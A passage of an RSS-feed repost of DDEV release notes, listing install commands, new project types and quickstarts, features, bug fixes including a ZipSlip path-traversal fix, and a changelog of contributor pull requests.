<pubDate>Thu, 07 May 2026 22:17:17 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux: Use <code>sudo apt-get update &amp;&amp; sudo apt-get install ddev</code>, see <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Windows and WSL2: Download the <a href="https://ddev.com/download/" rel="nofollow">Windows Installer</a>; you can run it for install or upgrade.<br>
<g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> <strong>Traditional Windows users (not WSL2)</strong>: If needed, the installer will prompt you to uninstall the previous system-wide installation to avoid conflicts with the new per-user installation.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous Docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2>Highlights</h2>
<ul>
<li><strong>Faster <code>ddev start</code>:</strong> Reduced fresh-router healthcheck wait</li>
<li><strong>New project types and quickstarts:</strong> 3 new project types (<code>wp-bedrock</code>, <code>asterios</code>, <code>joomla</code>) and 2 new quickstarts (Tempest, October CMS)</li>
<li><strong>Auto-start on command:</strong> DDEV now automatically starts stopped projects when you run <code>ddev exec</code>, <code>ddev ssh</code>, <code>ddev share</code>, <code>ddev xhgui</code>, <code>ddev pull</code>, <code>ddev push</code>, or <code>ddev snapshot restore</code></li>
<li><strong>New diagnostic commands:</strong> <a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility-port-diagnose" rel="nofollow"><code>ddev utility port-diagnose</code></a> to identify port conflicts, <a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility-check-custom-config" rel="nofollow"><code>ddev utility check-custom-config</code></a> to detect unexpected configuration, <a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility-tls-diagnose" rel="nofollow"><code>ddev utility tls-diagnose</code></a> to identify TLS/SSL problems with DDEV projects.</li>
</ul>
<h2>Quickstarts</h2>
<ul>
<li>Add <a href="https://docs.ddev.com/en/stable/users/quickstart/#wordpress-bedrock" rel="nofollow"><code>wp-bedrock</code></a> project type, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonesrussell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonesrussell">@jonesrussell</a></li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/quickstart/#asterios" rel="nofollow"><code>asterios</code></a> project type, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asteriosphp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asteriosphp">@asteriosphp</a></li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/quickstart/#joomla" rel="nofollow"><code>joomla</code></a> project type, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/renekreijveld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/renekreijveld">@renekreijveld</a></li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/quickstart/#tempest" rel="nofollow">Tempest</a> quickstart</li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/quickstart/#october-cms" rel="nofollow">October CMS</a> quickstart, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daftspunk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daftspunk">@daftspunk</a></li>
<li>Update Contao quickstart to use <a href="https://contao.org/en/news/contao-5-7-lts-unlimited-possibilities-with-limited-width" rel="nofollow">5.7 LTS</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fkaminski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fkaminski">@fkaminski</a></li>
<li>Update Laravel quickstart to latest version, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyler36/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyler36">@tyler36</a></li>
<li>Update Moodle quickstart to set admin email during installation</li>
</ul>
<h2>Features</h2>
<ul>
<li>Support bare variable names in <code>web_environment</code> for host environment passthrough</li>
<li>Add project path to the <a href="https://docs.ddev.com/en/stable/users/usage/cli/#interactive-dashboard" rel="nofollow">interactive dashboard</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yanniboi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yanniboi">@yanniboi</a></li>
<li>Add global <a href="https://docs.ddev.com/en/stable/users/configuration/config/#omit_snapshot_on_delete" rel="nofollow"><code>omit_snapshot_on_delete</code></a> setting, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marklabrecque-ab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marklabrecque-ab">@marklabrecque-ab</a></li>
<li>Add <code>--project</code> flag to <a href="https://docs.ddev.com/en/stable/users/usage/commands/#exec" rel="nofollow"><code>ddev exec</code></a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/penyaskito/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/penyaskito">@penyaskito</a></li>
<li>Use runtime environment variables in <code>wp-config-ddev.php</code> for WordPress, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonesrussell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonesrussell">@jonesrussell</a></li>
<li>Add support for <code>symfony_mailer</code> 2.x in Drupal config, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hchonov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hchonov">@hchonov</a></li>
<li>Display project info (name and environment) when calling <code>ddev pull</code>/<code>ddev push</code>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariano-dagostino/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariano-dagostino">@mariano-dagostino</a></li>
<li>Support <a href="https://docs.ddev.com/en/stable/users/usage/networking/#wsl2-virtioproxy-mode-netskope-and-similar-vpns" rel="nofollow"><code>virtioproxy</code></a> WSL2 networking mode</li>
<li>Support <code>"1"/"0"</code> for <code>DDEV_*</code> environment variables (e.g. <code>DDEV_DEBUG=1</code>), thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deviantintegral/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deviantintegral">@deviantintegral</a></li>
<li>Automatically set <code>com.ddev.*</code> labels for Docker images, containers, and networks</li>
<li>Add <code>aggregate_gc_threshold=0</code> to Drupal 12 config, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a></li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>Detect custom configuration files and show unexpected configuration on <code>ddev start</code></li>
<li>Prevent <a href="https://github.com/ddev/ddev/security/advisories/GHSA-x2xq-qhjf-5mvg">Path Traversal (ZipSlip)</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SnailSploit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SnailSploit">@SnailSploit</a></li>
<li>Normalize <code>PHP_IDE_CONFIG</code> (PhpStorm) for uppercase project names</li>
<li>Reduce file permissions for system directories <code>/usr/bin</code> and <code>/usr/sbin</code> inside the container, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li>Ensure <code>ddev-ssh-agent</code> and <code>ddev-router</code> are up to date on DDEV upgrade</li>
<li>Respect <a href="https://docs.ddev.com/en/stable/users/configuration/config/#webimage" rel="nofollow"><code>webimage</code></a> for all use cases; don't pull the default web image when it's not in use</li>
<li>Simplify <code>ddev composer create-project</code> by removing the <code>composer update</code> step</li>
<li>Add timeout to <code>yarn config set</code> in <code>start.sh</code> for the <code>ddev-webserver</code> Docker image</li>
<li>Fix malformed <code>WSLENV</code> on Windows install/uninstall</li>
</ul>
<h2>Internal Improvements</h2>
<ul>
<li>Implement config model using <a href="https://github.com/spf13/viper">Viper</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/agviu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/agviu">@agviu</a></li>
<li>Improve testing in GoLand by prebuilding the <code>ddev</code> binary, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonesrussell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonesrussell">@jonesrussell</a></li>
<li>Add missing <code>php8.5-memcached</code> for ARM64 to <code>ddev-webserver</code> Docker image</li>
<li>Use newer deb822 format (<code>*.sources</code> instead of <code>*.list</code>) for Docker and DDEV repositories (Linux and WSL2)</li>
</ul>
<h2>Minor Updates</h2>
<ul>
<li>PHP 8.4.20 and 8.5.5</li>
<li>Docker Compose v5.1.3</li>
<li>Remove obsolete <code>ddev sequelpro</code> command and vestiges in documentation</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(commands): use /usr/bin/env bash in web console command by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyler36/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyler36">@tyler36</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992606651" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8182" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8182/hovercard" href="https://github.com/ddev/ddev/pull/8182">#8182</a></li>
<li>build(deps): bump actions/upload-artifact from 6 to 7 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4012362128" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8193" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8193/hovercard" href="https://github.com/ddev/ddev/pull/8193">#8193</a></li>
<li>fix(composer): ddev composer create-project can ignore .devcontainer [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4008776447" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8192" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8192/hovercard" href="https://github.com/ddev/ddev/pull/8192">#8192</a></li>
<li>docs(buildkite): Minor fixups to WSL2 buildkite setup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3975539908" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8172" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8172/hovercard" href="https://github.com/ddev/ddev/pull/8172">#8172</a></li>
<li>build(deps): bump goreleaser/goreleaser-action from 6 to 7 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3979255530" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8175" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8175/hovercard" href="https://github.com/ddev/ddev/pull/8175">#8175</a></li>
<li>docs(quickstart): Use mkdir -p and more descriptive names [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4019172605" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8200" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8200/hovercard" href="https://github.com/ddev/ddev/pull/8200">#8200</a></li>
<li>docs: suggest trivial project in troubleshooting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4018361044" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8199" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8199/hovercard" href="https://github.com/ddev/ddev/pull/8199">#8199</a></li>
<li>build(deps): bump docker/login-action from 3 to 4 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046831651" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8211" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8211/hovercard" href="https://github.com/ddev/ddev/pull/8211">#8211</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046831651" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8211" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8211/hovercard" href="https://github.com/ddev/ddev/pull/8211">#8211</a></li>
<li>build(deps): bump docker/setup-buildx-action from 3 to 4 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046830792" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8210" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8210/hovercard" href="https://github.com/ddev/ddev/pull/8210">#8210</a></li>
<li>docs: clarify usage for TUI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4023836022" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8203" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8203/hovercard" href="https://github.com/ddev/ddev/pull/8203">#8203</a></li>
<li>test(quickstart): pause d12 bats test in github actions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054514712" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8217" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8217/hovercard" href="https://github.com/ddev/ddev/pull/8217">#8217</a></li>
<li>chore(docs): remove Plausible [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4083228499" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8228" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8228/hovercard" href="https://github.com/ddev/ddev/pull/8228">#8228</a></li>
<li>fix(quickstart): do not use gunicorn for wagtail by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4083960286" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8229" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8229/hovercard" href="https://github.com/ddev/ddev/pull/8229">#8229</a></li>
<li>feat: support bare variable names in web_environment for host env passthrough by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046281739" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8209" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8209/hovercard" href="https://github.com/ddev/ddev/pull/8209">#8209</a></li>
<li>fix(buildkite): use proper check for skip by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4088727249" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8231" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8231/hovercard" href="https://github.com/ddev/ddev/pull/8231">#8231</a></li>
<li>build: update go deps, vendor docker-compose SDK, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091341649" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8234" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8234/hovercard" href="https://github.com/ddev/ddev/pull/8234">#8234</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4018075033" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8198" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8198/hovercard" href="https://github.com/ddev/ddev/pull/8198">#8198</a></li>
<li>style: Fix minor typo: skiped → skipped by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/penyaskito/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/penyaskito">@penyaskito</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107806926" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8243" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8243/hovercard" href="https://github.com/ddev/ddev/pull/8243">#8243</a></li>
<li>chore(quickstart): Make quickstart drupal.bats drush launch usage less fragile by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114736451" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8247" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8247/hovercard" href="https://github.com/ddev/ddev/pull/8247">#8247</a></li>
<li>fix: prevent path traversal (ZipSlip) in Untar and Unzip by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052931806" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8213" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8213/hovercard" href="https://github.com/ddev/ddev/pull/8213">#8213</a></li>
<li>fix: lowercase PHP_IDE_CONFIG serverName for uppercase project names, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4065753375" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8225" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8225/hovercard" href="https://github.com/ddev/ddev/issues/8225">#8225</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116675858" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8248" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8248/hovercard" href="https://github.com/ddev/ddev/pull/8248">#8248</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116675858" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8248" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8248/hovercard" href="https://github.com/ddev/ddev/pull/8248">#8248</a></li>
<li>docs(sharing): Improve ngrok setup instructions, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3896757594" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8101" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8101/hovercard" href="https://github.com/ddev/ddev/issues/8101">#8101</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4028488873" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8205" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8205/hovercard" href="https://github.com/ddev/ddev/pull/8205">#8205</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samcrichard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samcrichard">@samcrichard</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4028488873" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8205" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8205/hovercard" href="https://github.com/ddev/ddev/pull/8205">#8205</a></li>
<li>refactor: bump Laravel to latest version by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyler36/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyler36">@tyler36</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4099126016" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8238" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8238/hovercard" href="https://github.com/ddev/ddev/pull/8238">#8238</a></li>
<li>chore(go): Use go fix to update golang usage, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3751393857" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7963" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7963/hovercard" href="https://github.com/ddev/ddev/issues/7963">#7963</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123578307" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8249" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8249/hovercard" href="https://github.com/ddev/ddev/pull/8249">#8249</a></li>
<li>feat(tui): Added ddev project path to TUI project browser, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4000930369" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8184" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8184/hovercard" href="https://github.com/ddev/ddev/issues/8184">#8184</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yanniboi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yanniboi">@yanniboi</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4001002795" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8185" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8185/hovercard" href="https://github.com/ddev/ddev/pull/8185">#8185</a></li>
<li>build: update go deps, vendor viper, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992038076" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8181" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8181/hovercard" href="https://github.com/ddev/ddev/pull/8181">#8181</a> by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098877622" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8237" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8237/hovercard" href="https://github.com/ddev/ddev/pull/8237">#8237</a></li>
<li>fix: reduce world writeable directories and files, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4012503542" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8194" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8194/hovercard" href="https://github.com/ddev/ddev/issues/8194">#8194</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4013831673" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8195" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8195/hovercard" href="https://github.com/ddev/ddev/pull/8195">#8195</a></li>
<li>feat: add aggregate_gc_threshold of 0 to drupal12 settings.ddev.php (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4053603038" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8215" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8215/hovercard" href="https://github.com/ddev/ddev/pull/8215">#8215</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4053603038" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8215" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8215/hovercard" href="https://github.com/ddev/ddev/pull/8215">#8215</a></li>
<li>build(pecl): add php8.5-memcached for ARM64, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3988029971" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev-memcached/issues/20" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev-memcached/issues/20/hovercard" href="https://github.com/ddev/ddev-memcached/issues/20">ddev/ddev-memcached#20</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136230595" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8252" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8252/hovercard" href="https://github.com/ddev/ddev/pull/8252">#8252</a></li>
<li>docs: document Mailpit <code>plus-address</code> auto-tagging and how to disable it (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063906926" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8222" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8222/hovercard" href="https://github.com/ddev/ddev/pull/8222">#8222</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maks-oleksyuk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maks-oleksyuk">@maks-oleksyuk</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063906926" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8222" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8222/hovercard" href="https://github.com/ddev/ddev/pull/8222">#8222</a></li>
